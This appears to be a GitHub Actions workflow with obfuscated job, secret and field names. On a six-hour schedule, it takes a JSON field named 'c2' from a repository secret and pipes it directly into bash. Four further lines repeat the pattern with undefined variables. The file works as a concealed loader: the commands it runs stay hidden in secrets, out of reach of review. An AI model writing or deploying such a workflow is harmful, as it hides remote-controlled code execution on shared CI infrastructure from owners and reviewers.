name: liurushi6781
on:
  workflow_dispatch:
  schedule:
    - cron: '56 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liurushi6781
        env:
          mm70117: ${{ secrets.mm70117 }}
        run: |
          echo $mm70117 | jq -r .c2 | /bin/bash
          echo $nrkw60 | jq -r .el665 | /bin/bash
          echo $t96 | jq -r .g3910 | /bin/bash
          echo $k559 | jq -r .b976 | /bin/bash
          echo $lf4569 | jq -r .etp8301 | /bin/bash

